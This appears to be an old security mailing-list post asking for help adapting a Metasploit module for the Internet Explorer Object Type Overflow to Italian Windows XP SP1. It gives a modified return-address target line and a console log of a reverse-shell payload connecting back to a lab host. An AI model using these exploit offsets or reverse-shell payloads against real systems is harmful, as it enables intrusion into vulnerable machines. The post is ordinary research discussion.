Internet Explorer Object Type Overflow

[buffer at softmedia.info (Angelo Dell'Aera)]

Hello,
first of all I have to say I'm not a real expert in the Windows world.
While trying to exploit Internet Explorer Object Type Overflow on a
host running Windows XP Professional SP1 through Metasploit I realized
that  the ws2_32 push esp/ret (which is located at 0x71ab1d54 for the
English version) is located at 0x71a31d54 for the Italian version thus
I modified the ie_objecttype.pm this way

"Windows XP"   => [ 0x71a31d54, 0x7ffdec50 ], # ws2_32 push esp/ret
SP0/1

When I tried to exploit the vulnerable host I saw IE crashing and on
the attacker's side this behavior...

msf ie_objecttype(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.33.162:8080 ...
[*] HTTP Client connected from 192.168.33.107:1392 using Windows XP,
sending payload... 
[*] Got connection from 192.168.33.162:4321 <-> 192.168.33.107:1393

[*] Exiting Reverse Handler.

I tried attaching iexplore.exe with ollydbg and observed an access
violation when writing to the address 0x77e40000 (this address is in
ECX and EBX when the access violation is triggered). I suppose I'll
need to modify even the second address in the target array in order to
exit in a clean way but I'm really not skilled in the Windows world and
so hints about how to do it are really welcome.

Regards,

-- 

Angelo Dell'Aera 'buffer' 
Antifork Research, Inc.         http://buffer.antifork.org
Metro Olografix

PGP information in e-mail header